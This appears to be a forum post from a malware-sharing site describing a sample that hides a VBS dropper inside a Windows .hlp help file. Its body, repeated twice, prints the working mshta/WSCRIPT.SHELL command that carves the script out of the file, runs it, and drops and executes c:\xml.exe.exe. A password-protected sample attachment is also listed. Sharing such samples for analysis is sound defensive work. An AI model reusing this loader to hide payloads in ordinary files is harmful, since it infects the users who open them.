Here is a innovative method of malware delivery.
The delivery vehicle is a windows .hlp file, that contains a embedded VBS script as a comment.
If anyone manages to extract this scrip with normal tools such as "uniextract" please let me know. (I simply copied it from c:\a.vbs)
When opened the help script engine runs mshta.exe with the following parameters:
new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C FOR /F "USEBACKQDELIMS=" %I IN (`DIR/B *.HLP`)DO FINDSTR /B INT3 "%I">C:/A.VBS&C:/A.VBS',0);close()
This will extract the VBS script from the original .hlp file into the c:\A.VBS and run it.
The VBS script then creates the file c:\xml.exe.exe (yes two .exe endings), and runs it.
The Virustotal report for xml.exe.exe is http://www.virustotal.com/file-scan/rep ... 1319203716
The delivery vehicle is a windows .hlp file, that contains a embedded VBS script as a comment.
If anyone manages to extract this scrip with normal tools such as "uniextract" please let me know. (I simply copied it from c:\a.vbs)
When opened the help script engine runs mshta.exe with the following parameters:
new ActiveXObject('WSCRIPT.SHELL').RUN('CMD /C FOR /F "USEBACKQDELIMS=" %I IN (`DIR/B *.HLP`)DO FINDSTR /B INT3 "%I">C:/A.VBS&C:/A.VBS',0);close()
This will extract the VBS script from the original .hlp file into the c:\A.VBS and run it.
The VBS script then creates the file c:\xml.exe.exe (yes two .exe endings), and runs it.
The Virustotal report for xml.exe.exe is http://www.virustotal.com/file-scan/rep ... 1319203716
Attachments
PW: Infected
(23.05 KiB) Downloaded 56 times
(23.05 KiB) Downloaded 56 times